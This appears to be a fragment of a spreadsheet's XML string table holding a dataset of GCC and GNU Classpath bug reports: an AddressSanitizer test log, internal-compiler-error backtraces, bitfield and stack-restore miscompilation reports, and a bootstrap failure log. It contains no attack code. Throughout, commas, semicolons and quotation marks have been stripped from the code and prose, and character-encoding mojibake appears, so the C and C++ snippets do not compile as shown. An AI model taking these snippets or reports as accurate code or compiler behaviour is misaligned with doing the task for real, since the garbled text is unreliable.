Executing on host: /sw/src/fink.build/gcc49-4.9.0-1000/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc49-4.9.0-1000/darwin_objdir/gcc/ /sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c   -B/sw/src/fink.build/gcc49-4.9.0-1000/darwin_objdir/x86_64-apple-darwin13.0.0/i386/libsanitizer/  -B/sw/src/fink.build/gcc49-4.9.0-1000/darwin_objdir/x86_64-apple-darwin13.0.0/i386/libsanitizer/asan/  -L/sw/src/fink.build/gcc49-4.9.0-1000/darwin_objdir/x86_64-apple-darwin13.0.0/i386/libsanitizer/asan/.libs  -fsanitize=address -g -fno-diagnostics-show-caret -fdiagnostics-color=never   -O0    -lm   -m32 -o ./pr59063-1.exe    (timeout = 300)
spawn /sw/src/fink.build/gcc49-4.9.0-1000/darwin_objdir/gcc/xgcc -B/sw/src/fink.build/gcc49-4.9.0-1000/darwin_objdir/gcc/ /sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c -B/sw/src/fink.build/gcc49-4.9.0-1000/darwin_objdir/x86_64-apple-darwin13.0.0/i386/libsanitizer/ -B/sw/src/fink.build/gcc49-4.9.0-1000/darwin_objdir/x86_64-apple-darwin13.0.0/i386/libsanitizer/asan/ -L/sw/src/fink.build/gcc49-4.9.0-1000/darwin_objdir/x86_64-apple-darwin13.0.0/i386/libsanitizer/asan/.libs -fsanitize=address -g -fno-diagnostics-show-caret -fdiagnostics-color=never -O0 -lm -m32 -o ./pr59063-1.exe^M
/sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c:4:26: error: unknown type name 'clockid_t'^M
/sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c: In function 'main':^M
/sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c:7:8: error: 'clock_gettime' undeclared (first use in this function)^M
/sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c:7:8: note: each undeclared identifier is reported only once for each function it appears in^M
/sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c:10:23: error: 'CLOCK_MONOTONIC' undeclared (first use in this function)^M
compiler exited with status 1
output is:
/sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c:4:26: error: unknown type name 'clockid_t'^M
/sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c: In function 'main':^M
/sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c:7:8: error: 'clock_gettime' undeclared (first use in this function)^M
/sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c:7:8: note: each undeclared identifier is reported only once for each function it appears in^M
/sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c:10:23: error: 'CLOCK_MONOTONIC' undeclared (first use in this function)^M
FAIL: c-c++-common/asan/pr59063-1.c  -O0  (test for excess errors)
Excess errors:
/sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c:4:26: error: unknown type name 'clockid_t'
/sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c:7:8: error: 'clock_gettime' undeclared (first use in this function)
/sw/src/fink.build/gcc49-4.9.0-1000/gcc-4.9-20131202/gcc/testsuite/c-c++-common/asan/pr59063-1.c:10:23: error: 'CLOCK_MONOTONIC' undeclared (first use in this function)
UNRESOLVED: c-c++-common/asan/pr59063-1.c  -O0  compilation failed to produce executable</t>
  </si>
  <si>
    <t>GCC-78121</t>
  </si>
  <si>
    <t>[7 Regression] ice in set_value_range</t>
  </si>
  <si>
    <t>Created attachment 39902
C source code
The attached code when compiled by gcc dated 20161026 and compiler
flags -O2 -ansi does this:
$ ../results/bin/gcc -c -ansi -O2 bug317.c 2&gt;&amp;1 | more
output.c: In function â€˜indicate_specialâ€™:
output.c:778:1: internal compiler error: in set_value_range at tree-vrp.c:367
0xed2af0 set_value_range
	../../trunk/gcc/tree-vrp.c:367
0xed4b9c get_value_range
	../../trunk/gcc/tree-vrp.c:699
0xed4e34 vrp_valueize
	../../trunk/gcc/tree-vrp.c:7054
0x105d4bf do_valueize
	../../trunk/gcc/gimple-match-head.c:557
I'll have a go at reducing the source code file.</t>
  </si>
  <si>
    <t>GCC-3197</t>
  </si>
  <si>
    <t>Segfault in basic_ios::widen</t>
  </si>
  <si>
    <t xml:space="preserve">	The attached program dies with an segmentation fault during
	initialization (see call stack below).  The program works
	with older gcc versions.
	I have tried a compiler configured with --disable-c-mbchars and
	have used different settings of LANG and LC_* including unsetting
	them without success.
Call stack:
#0  ?? ()
#1  std::basic_ios &gt;::widen(char) const ()
  at /usr/local/include/g++-v3/bits/basic_ios.tcc:99
#2  std::basic_ios &gt;::init(std::basic_streambuf &gt;*) ()
#3  std::ios_base::Init::_S_ios_create(bool) (__sync=232)
  at ../../../../gcc-3.0-20010614/libstdc++-v3/include/bits/std_ostream.h:67
#4  std::ios_base::Init::Init() (this=0x32a54)
  at ../../../../gcc-3.0-20010614/libstdc++-v3/src/ios.cc:203
#5  __static_initialization_and_destruction_0(int int) ()
#6  _GLOBAL__I_verbose ()
#7  __do_global_ctors_aux ()
#8  _init ()
(gdb) frame 1
#1  0x18a78 in _ZNKSt9basic_iosIcSt11char_traitsIcEE5widenEc (this=0xff37fa3c 
    __c=32 ' ') at /usr/local/include/g++-v3/bits/basic_ios.tcc:99
99          { return _M_ios_fctype-&gt;widen(__c) }
(gdb) print *_M_ios_fctype
$1 = {&gt; = { = {_vptr. = 0xff375c40 
      _M_references = 0}  = {static upper = 1 static lower = 2 
      static alpha = 16384 static digit = 4 static xdigit = 128 
      static space = 8 static print = 32768 static graph = 8192 
      static cntrl = 32 static punct = 16 
      static alnum = 16388} } _M_del = false 
  _M_toupper = @0xff2b7268 _M_tolower = @0xff2b726c _M_ctable = @0xffbeee84 
  _M_table = 0xff2a05d8 static id = {_M_index = 2 static _S_highwater = 13} 
  static table_size = 256}
Release:
3.0 20010614 (prerelease)
Environment:
System: SunOS memorum 5.7 Generic_106541-08 sun4u sparc SUNWUltra-1
Architecture: sun4
host: sparc-sun-solaris2.7
build: sparc-sun-solaris2.7
target: sparc-sun-solaris2.7
configured with: ../gcc-3.0-20010614/configure --enable-languages=cc++ --with-gnu-ld --with-ld=/usr/local/sparc-sun-solaris2.7/bin/ld --with-gnu-as --with-as=/usr/local/sparc-sun-solaris2.7/bin/as --disable-threads --disable-nls
How-To-Repeat:
	g++ -O0 -o makedep
	./makedep</t>
  </si>
  <si>
    <t>los</t>
  </si>
  <si>
    <t>GCC-30682</t>
  </si>
  <si>
    <t>[4.3 Regression] Generation of gcc.1 manpage broken (texi2pod fails)</t>
  </si>
  <si>
    <t>This broke between seemingly between
2007-01-11 18:22 CET
and
2007-01-12 23:07 CET
gcc-build/gcc&gt; perl ~/gcc/gcc/../contrib/texi2pod.pl ~/gcc/gcc/doc/invoke.texi &gt; gcc.pod
@table ended by @end multitable at line 10414
Invoke.texi contains:
 @table
 ...
   @multitable
 ...
   @end multitable
 ...
 @end table</t>
  </si>
  <si>
    <t>GCC-52931</t>
  </si>
  <si>
    <t>std::hash shouldn't be defined for unknown types</t>
  </si>
  <si>
    <t>As explained by Daniel KrÃ¼gler in c++std-lib-32420 and nearby messages the default definition of std::hash is non-standard it is supposed to be undefined so we can test with sfinae whether hash was specialized for some type.</t>
  </si>
  <si>
    <t>GCC-38027</t>
  </si>
  <si>
    <t>bitfields and -O2 or greater</t>
  </si>
  <si>
    <t>The following program when compiled with gcc 4.1.2 works but with 4.3.0 it 
produces incorrect output at optimisation level O2 or greater.
 / * ------ */
#include 
#include 
using namespace std
typedef unsigned int uint32_t
typedef unsigned short uint16_t
typedef unsigned char uint8_t
class CColourARGB4444
class CColourARGB8888
{
public :
    union
    {
        struct
        {
            uint32_t mBlue      : 8
            uint32_t mGreen     : 8
            uint32_t mRed       : 8
            uint32_t mAlpha     : 8
        } mBits
        uint32_t mWord
    } mCol
    CColourARGB8888(const CColourARGB4444 
}
class CColourARGB4444
{
public :
    union
    {
        struct
        {
            uint16_t mBlue      : 4
            uint16_t mGreen     : 4
            uint16_t mRed       : 4
            uint16_t mAlpha     : 4
        } mBits
        uint16_t mWord
    } mCol
public :
    /// CColourARGB4444 constructor
    CColourARGB4444(const uint8_t &amp;alpha const uint8_t &amp;red const uint8_t &amp;green const uint8_t &amp;blue)
        { mCol.mBits.mAlpha = alpha mCol.mBits.mRed = red mCol.mBits.mGreen = green mCol.mBits.mBlue = blue }
}
__inline CColourARGB8888::CColourARGB8888(const CColourARGB4444 &amp;rhs)
{
    mCol.mBits.mRed   = ((rhs.mCol.mBits.mRed &lt;&lt; 4) 
    mCol.mBits.mGreen = ((rhs.mCol.mBits.mGreen &lt;&lt; 4) 
    mCol.mBits.mBlue  = ((rhs.mCol.mBits.mBlue &lt;&lt; 4) 
    mCol.mBits.mAlpha = ((rhs.mCol.mBits.mAlpha &lt;&lt; 4) 
    printf(Constructing CColourARGB8888 %x from CColourARGB4444 %x\n mCol.mWord rhs.mCol.mWord)
}
void broken()
{
    for (uint8_t y = 0 y &lt; 4 ++y) {
        for (uint8_t x = 0 x &lt; 4 ++x) {
            CColourARGB4444 c4(0xF x y 0)
            CColourARGB8888 c8(c4)
        }
    }
}
CColourARGB4444 myfoo(uint8_t XT uint8_t YT) {
    return CColourARGB4444(0xF XT YT 0)
}
void ok()
{
    for (uint8_t y = 0 y &lt; 4 ++y) {
        for (uint8_t x = 0 x &lt; 4 ++x) {
            CColourARGB4444 c4 = myfoo(x y)
            CColourARGB8888 c8(c4)
        }
    }
}
int main()
{
        printf(this\n)
        ok()
        printf(that\n)
        broken()
}
    /* --- end --- */
When not working the bit fields have not been updated e.g. a broken case
output is
Constructing CColourARGB8888 ff000000 from CColourARGB4444 f330
When working the output has updated bitfields e.g.
Constructing CColourARGB8888 ff333300 from CColourARGB4444 f330</t>
  </si>
  <si>
    <t>john.spelis</t>
  </si>
  <si>
    <t>GCC-43220</t>
  </si>
  <si>
    <t>[4.3 Regression] Paritially optimized __builtin_save_stack/__builtin_restore_stack causes segmentation fault</t>
  </si>
  <si>
    <t xml:space="preserve">I encountered a segmentation fault when executing an unrolled version of 20040811-1.c (tested with -O2)
void *volatile p
int
main (void)
{
  int n = 0
 lab:
  {
  int x[n % 1000 + 1]
  x[0] = 1
  x[n % 1000] = 2
  p = x
  n++
  }
  {
  int x[n % 1000 + 1]
  x[0] = 1
  x[n % 1000] = 2
  p = x
  n++
  }
  if (n &lt; 1000000)
    goto lab
  return 0
}
The problem is that the first pair of __builtin_stack_save/__builtin_satck_restore of the unrolled loop is optimized out in optimize_stack_restore (tree-ssa-ccp.c) of fab pass. Consequently the dynamic memory allocated grows bigger and bigger and causes segfault. The following is from tst.c.139t.optimized
lab:
  saved_stack.1_3 = 0B
  D.2723_4 = n_1 % 1000
  D.2724_5 = D.2723_4 + 1
  D.2728_15 = (long unsigned int) D.2724_5
  D.2730_16 = D.2728_15 * 4
  D.2732_17 = __builtin_alloca (D.2730_16)
  x.0_18 = (int[0:D.2727] *) D.2732_17
  (*x.0_18)[0] = 1
  (*x.0_18)[D.2723_4] = 2
  p ={v} x.0_18
  D.2770_66 = (unsigned int) n_1
  D.2771_65 = D.2770_66 + 1
  n_64 = (int) D.2771_65
  GIMPLE_NOP
  saved_stack.3_21 = __builtin_stack_save ()
  D.2723_22 = n_64 % 1000
  D.2734_23 = D.2723_22 + 1
  D.2738_33 = (long unsigned int) D.2734_23
  D.2740_34 = D.2738_33 * 4
  D.2742_35 = __builtin_alloca (D.2740_34)
  x.2_36 = (int[0:D.2737] *) D.2742_35
  (*x.2_36)[0] = 1
  (*x.2_36)[D.2723_22] = 2
  p ={v} x.2_36
  D.2773_62 = D.2770_66 + 2
  n_61 = (int) D.2773_62
  __builtin_stack_restore (saved_stack.3_21)
  if (n_61 != 1000000)
    goto  (lab)
  else
    goto </t>
  </si>
  <si>
    <t>bmei</t>
  </si>
  <si>
    <t>GCC-3348</t>
  </si>
  <si>
    <t>Corrupt /cvs/gcc/gcc/gcc/ChangeLogv</t>
  </si>
  <si>
    <t>/cvs/gcc/gcc/gcc/ChangeLogv is corrupt preventing checkouts of EGCS
1.0.1 using the tag we document in the GCC web pages.  This has been
noted on the gcc list by a user trying to check out on that tag and
previously reported to overseers (to which I'll assign this PR).
Release:
3.0
Environment:
System: Linux digraph 2.2.19 #1 Wed Mar 28 16:01:38 UTC 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.0/configure --prefix=/usr --with-slibdir=/lib --enable-shared --enable-threads=posix --with-system-zlib
How-To-Repeat:
Try to check out an affected revision or run cvs log on rlog on the
file.</t>
  </si>
  <si>
    <t>GCC-83941</t>
  </si>
  <si>
    <t>Debug info generated with -flto contains useless forwarders</t>
  </si>
  <si>
    <t>Currently for
int main()
{
  int i
  return 0
}
we emit
 : Abbrev Number: 2 (DW_TAG_subprogram)
       DW_AT_external    : 1
       DW_AT_name        : (indirect string offset: 0x152): main
       DW_AT_decl_file   : 1
       DW_AT_decl_line   : 1
       DW_AT_decl_column : 5
       DW_AT_type        : 
       DW_AT_sibling     : 
 : Abbrev Number: 3 (DW_TAG_variable)
       DW_AT_name        : i
       DW_AT_decl_file   : 1
       DW_AT_decl_line   : 3
       DW_AT_decl_column : 7
       DW_AT_type        : 
 : Abbrev Number: 0
 : Abbrev Number: 4 (DW_TAG_base_type)
       DW_AT_byte_size   : 4
       DW_AT_encoding    : 5       (signed)
       DW_AT_name        : int
in the early unit and
 : Abbrev Number: 3 (DW_TAG_subprogram)
       DW_AT_abstract_origin: 
       DW_AT_low_pc      : 0x4004b6
       DW_AT_high_pc     : 0x6
       DW_AT_frame_base  : 1 byte block: 9c        (DW_OP_call_frame_cfa)
       DW_AT_GNU_all_call_sites: 1
 : Abbrev Number: 4 (DW_TAG_variable)
       DW_AT_abstract_origin: 
in the late one.  Note the useless DIE for 'i' which isn't necessary
to make gdb print '' - gdb happily picks up variables
for name lookup without the extra forwarder via the DW_TAG_subprogram
abstract origin children.</t>
  </si>
  <si>
    <t>GCC-60340</t>
  </si>
  <si>
    <t>ICE on valid code with -fcheck-data-deps at -O1 and above on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled by the current gcc trunk with -fcheck-data-deps at -O1 and above on x86_64-linux-gnu (in both 32-bit and 64-bit modes). 
It also affects 4.7.x and 4.8.x but not 4.6.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 4.9.0 20140225 (experimental) [trunk revision 208111] (GCC) 
$ 
$ gcc-trunk -O1 -c small.c
$ gcc-trunk -O0 -fcheck-data-deps -c small.c
$ gcc-4.6.4 -O1 -fcheck-data-deps -c small.c
$ 
$ gcc-trunk -O1 -fcheck-data-deps -c small.c
(Number of distance vectors differ: Banerjee has 1 Omega has 2.
Banerjee dist vectors:
  0 
Omega dist vectors:
  0 
  1 
data dependence relation:
(Data Dep: 
#(Data Ref: 
#  bb: 4 
#  stmt: a.0_4 ={v} a
#  ref: a
#  base_object: MEM[(int *)
#)
#(Data Ref: 
#  bb: 4 
#  stmt: a ={v} a.1_5
#  ref: a
#  base_object: MEM[(int *)
#)
  inner loop index: 0
  loop nest: (1 )
  distance_vector:   0 
  distance_vector:   1 
  direction_vector:     =
  direction_vector:     +
)
)
small.c: In function â€˜fooâ€™:
small.c:3:6: internal compiler error: in compute_affine_dependence at tree-data-ref.c:4233
 void foo ()
      ^
0xf187fb compute_affine_dependence(data_dependence_relation* loop*)
	../../gcc-trunk/gcc/tree-data-ref.c:4232
0xf1908a compute_all_dependences(vec vec* vec bool)
	../../gcc-trunk/gcc/tree-data-ref.c:4304
0xf19a20 compute_data_dependences_for_loop(loop* bool vec* vec* vec*)
	../../gcc-trunk/gcc/tree-data-ref.c:4632
0xf19b0e analyze_all_data_dependences
	../../gcc-trunk/gcc/tree-data-ref.c:4740
0xf19b0e tree_check_data_deps()
	../../gcc-trunk/gcc/tree-data-ref.c:4787
0xaa51c7 check_data_deps
	../../gcc-trunk/gcc/tree-ssa-loop.c:209
0xaa51c7 execute
	../../gcc-trunk/gcc/tree-ssa-loop.c:245
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-------------------------
volatile int a
void foo ()
{
  for ( a &lt; 1 a++)
}</t>
  </si>
  <si>
    <t>GCC-68724</t>
  </si>
  <si>
    <t>[5/6/7 Regression] ice in unify at cp/pt.c:19902</t>
  </si>
  <si>
    <t>ICE on invalid code
$ g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/home/regehr/z/compiler-install/gcc-r231259-install/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /home/regehr/z/compiler-source/gcc/configure --prefix=/home/regehr/z/compiler-install/gcc-r231259-install --disable-bootstrap --disable-multilib --enable-languages=cc++
Thread model: posix
gcc version 6.0.0 20151204 (experimental) (GCC) 
$ cat hello.cpp
template  struct integral_constant {
} struct : integral_constant &lt; bool true {
} template  struct integral_constant &lt; bool __is_enum(_Tp) {
$ g++ -std=c++11 hello.cpp -w
hello.cpp:2:1: error: expected â€˜â€™ after struct definition
 } struct : integral_constant &lt; bool true {
 ^
hello.cpp:2:12: error: parse error in template argument list
 } struct : integral_constant &lt; bool true {
            ^~~~~~~~~~~~~~~~~
hello.cpp:3:1: error: expected â€˜â€™ after struct definition
 } template  struct integral_constant &lt; bool __is_enum(_Tp) {
 ^
hello.cpp:3:1: error: abstract declarator â€˜â€™ used as declaration
hello.cpp:3:34: error: parse error in template argument list
 } template  struct integral_constant &lt; bool __is_enum(_Tp) {
                                  ^~~~~~~~~~~~~~~~~
hello.cpp:3:34: error: template argument â€˜__is_enum(_Tp)â€™ involves template parameter(s)
hello.cpp:3:34: internal compiler error: in unify at cp/pt.c:19902
0x644f9a unify
	/home/regehr/z/compiler-source/gcc/gcc/cp/pt.c:19902
0x644c45 unify
	/home/regehr/z/compiler-source/gcc/gcc/cp/pt.c:19703
0x64759e get_partial_spec_bindings
	/home/regehr/z/compiler-source/gcc/gcc/cp/pt.c:20466
0x63ef8b most_specialized_partial_spec
	/home/regehr/z/compiler-source/gcc/gcc/cp/pt.c:20735
0x64aa17 process_partial_specialization
	/home/regehr/z/compiler-source/gcc/gcc/cp/pt.c:4694
0x64bddf push_template_decl_real(tree_node* bool)
	/home/regehr/z/compiler-source/gcc/gcc/cp/pt.c:5214
0x64f2b6 push_template_decl
	/home/regehr/z/compiler-source/gcc/gcc/cp/pt.c:5455
0x64f2b6 maybe_process_partial_specialization(tree_node*)
	/home/regehr/z/compiler-source/gcc/gcc/cp/pt.c:961
0x6c6fd4 cp_parser_class_head
	/home/regehr/z/compiler-source/gcc/gcc/cp/parser.c:21401
0x6c6fd4 cp_parser_class_specifier_1
	/home/regehr/z/compiler-source/gcc/gcc/cp/parser.c:20785
0x6c85d9 cp_parser_class_specifier
	/home/regehr/z/compiler-source/gcc/gcc/cp/parser.c:21081
0x6c85d9 cp_parser_type_specifier
	/home/regehr/z/compiler-source/gcc/gcc/cp/parser.c:15391
0x6e568b cp_parser_decl_specifier_seq
	/home/regehr/z/compiler-source/gcc/gcc/cp/parser.c:12343
0x6f2c13 cp_parser_single_declaration
	/home/regehr/z/compiler-source/gcc/gcc/cp/parser.c:25207
0x6f2fea cp_parser_template_declaration_after_parameters
	/home/regehr/z/compiler-source/gcc/gcc/cp/parser.c:24903
0x6f3c14 cp_parser_explicit_template_declaration
	/home/regehr/z/compiler-source/gcc/gcc/cp/parser.c:25134
0x6f3c14 cp_parser_template_declaration_after_export
	/home/regehr/z/compiler-source/gcc/gcc/cp/parser.c:25152
0x6fde39 cp_parser_declaration
	/home/regehr/z/compiler-source/gcc/gcc/cp/parser.c:11710
0x6fc24d cp_parser_declaration_seq_opt
	/home/regehr/z/compiler-source/gcc/gcc/cp/parser.c:11632
0x6fc598 cp_parser_translation_unit
	/home/regehr/z/compiler-source/gcc/gcc/cp/parser.c:4189
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-8553</t>
  </si>
  <si>
    <t>AltiVec vec_abs broken at -O0 with register keyword</t>
  </si>
  <si>
    <t>With no optimization specifying a register vector variable will stomp on the temporary registers used by the vec_abs function which actually generates 3 vector instructions.
Release:
gcc version 3.3 20021104 (experimental)
Environment:
Configured with: ../gcc3.3/configure --prefix=/usr/local/darwin --enable-altivec --enable-languages=c --with-cpu=7400 --target=powerpc-apple-darwin6.1
How-To-Repeat:
void VecAbsIsBroken (short *image)
/* gcc3.3 broken at -O0 works at -O1 and above remove register keyword to fix */
{
	short *p
	register vector signed short v
	p = image
	v = vec_ld (0 p)
	v = vec_abs (v)
	printf (%p %hd:  p *p)
	PrintShortVector (v) printf (\n)
}
/*
_VecAbsIsBroken:
L_VecAbsIsBroken$stub: 
        mfspr r12256
        stw r12-12(r1)
        oris r12r120xdfff
        ori r12r1261440
        mtspr 256r12
        mflr r0
        stw r30-8(r1)
        stw r31-4(r1)
        stw r08(r1)
        stwu r1-96(r1)
        mr r30r1      
        bcl 2031L4$pb 
L4$pb:
        mflr r31      
        stw r3120(r30)
        lwz r0120(r30)
        stw r056(r30)
        li r110       
        lwz r956(r30)
        lvx v0r11r9
        addi r9r3064
        stvx v00r9
        addi r9r3064
        lvx v10r9             By loading v1 with the input to vec_abs we doom it to fail
        vspltisb v10           v1 should NOT be used as a temporary register here
        vsubuhm v13v1v1       This just zeroed out v13 not good!
        vmaxsh v0v1v13        So we end up with 0s!
        addi r9r3064
        stvx v00r9
*/</t>
  </si>
  <si>
    <t>CLASSPATH-30597</t>
  </si>
  <si>
    <t>xml</t>
  </si>
  <si>
    <t>XML parsing deviates from Java behaviour</t>
  </si>
  <si>
    <t>I'm working on Project Dynvocation (http://dynvocation.selfip.net) which relies on XML parsing a lot. Two issues have occurred with Classpath which do not occur with Java. Tracking them down to a testcase was quite easy but I'm not sure how easy fixing them will be.
I will attach a testcase which does not require further dependencies.
This is on Classpath 0.91 with GIJ 4.1 (using Debian's standard java-gcj-compat-dev free Java development environment).
I don't know about how much was fixed in 0.93 since I cannot easily test it on my existing installation - the respective VM authors are already aware of this :)</t>
  </si>
  <si>
    <t>dog</t>
  </si>
  <si>
    <t>2005</t>
  </si>
  <si>
    <t>GCC-28111</t>
  </si>
  <si>
    <t>ICE with invalid friend in template class</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE since at least GCC 2.95.3:
=================================
template void foo()
template struct A
{
    friend void foo(typename T::X)
}
A a
=================================
bug.cc: In instantiation of 'A':
bug.cc:8:   instantiated from here
bug.cc:5: error: 'int' is not a class struct or union type
bug.cc:5: internal compiler error: tree check: expected function_type or method_type have error_mark in determine_specialization at cp/pt.c:1396
Please submit a full bug report [etc.]
Testing a patch.</t>
  </si>
  <si>
    <t>GCC-55292</t>
  </si>
  <si>
    <t>libsanitizer doesn't support x32</t>
  </si>
  <si>
    <t>sanitizer_common/sanitizer_linux.cc has
void *internal_mmap(void *addr uptr length int prot int flags
                    int fd u64 offset) {
#if __WORDSIZE == 64
  return (void *)syscall(__NR_mmap addr length prot flags fd offset)
#else
  return (void *)syscall(__NR_mmap2 addr length prot flags fd offset)
#endif
}
uptr internal_filesize(fd_t fd) {
#if __WORDSIZE == 64
  struct stat st
  if (syscall(__NR_fstat fd &amp;st))
    return -1
#else
  struct stat64 st
  if (syscall(__NR_fstat64 fd &amp;st))
    return -1
#endif
  return (uptr)st.st_size
}
They are incorrect for x32.</t>
  </si>
  <si>
    <t>GCC-55074</t>
  </si>
  <si>
    <t>error during bootstrap of trunk</t>
  </si>
  <si>
    <t>On the same machine and same environment where I bootstrap 4.6 4.7 google-4.6 and google-4.7 I have not been able to bootstrap trunk as r192821. It may be worth noting that I see similar errors when I attempt a profiledbootstrap with google/4_7 but not with any FSF branch or google/4_6.
My configure line:
../gcc-trunk/configure --program-suffix=-4.8 --prefix=/u/mhargett --enable-lto  --with-fpmath=sse --disable-libmudflap --disable-libssp --enable-gold=yes --with-mpc=/u/mhargett --with-cloog=/u/mhargett/ --with-ppl=/u/mhargett/ --with-gmp=/u/mhargett/ --with-isl=/u/mhargett --with-mpfr=/u/mhargett/ --enable-cloog-backend=isl CC=gcc-4.7 CXX=g++-4.7 --enable-languages=cc++lto
Always results in this error even without bootstrap-lto and without profiledbootstrap just make -j8:
/work/mhargett/gcc-trunk-obj/./prev-gcc/g++ -B/work/mhargett/gcc-trunk-obj/./prev-gcc/ -B/u/mhargett/x86_64-unknown-linux-gnu/bin/ -nostdinc++ -B/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -B/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -I/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/include/x86_64-unknown-linux-gnu -I/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/include -I/work/mhargett/gcc-trunk/libstdc++-v3/libsupc++ -L/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -L/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -c   -g -O2 -fprofile-use -DIN_GCC   -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc-trunk/gcc -I../../gcc-trunk/gcc/. -I../../gcc-trunk/gcc/../include -I../../gcc-trunk/gcc/../libcpp/include -I/u/mhargett//include -I/u/mhargett//include -I/u/mhargett/include  -I../../gcc-trunk/gcc/../libdecnumber -I../../gcc-trunk/gcc/../libdecnumber/bid -I../libdecnumber -I../../gcc-trunk/gcc/../libbacktrace -DCLOOG_INT_GMP -I/u/mhargett//include -I/u/mhargett/include  ../../gcc-trunk/gcc/cfgrtl.c -o cfgrtl.o
/work/mhargett/gcc-trunk-obj/./prev-gcc/g++ -B/work/mhargett/gcc-trunk-obj/./prev-gcc/ -B/u/mhargett/x86_64-unknown-linux-gnu/bin/ -nostdinc++ -B/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -B/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -I/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/include/x86_64-unknown-linux-gnu -I/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/include -I/work/mhargett/gcc-trunk/libstdc++-v3/libsupc++ -L/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -L/work/mhargett/gcc-trunk-obj/prev-x86_64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -c   -g -O2 -fprofile-use -DIN_GCC   -fno-exceptions -fno-rtti -fasynchronous-unwind-tables -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror -fno-common  -DHAVE_CONFIG_H -I. -I. -I../../gcc-trunk/gcc -I../../gcc-trunk/gcc/. -I../../gcc-trunk/gcc/../include -I../../gcc-trunk/gcc/../libcpp/include -I/u/mhargett//include -I/u/mhargett//include -I/u/mhargett/include  -I../../gcc-trunk/gcc/../libdecnumber -I../../gcc-trunk/gcc/../libdecnumber/bid -I../libdecnumber -I../../gcc-trunk/gcc/../libbacktrace -DCLOOG_INT_GMP -I/u/mhargett//include -I/u/mhargett/include  ../../gcc-trunk/gcc/symtab.c -o symtab.o
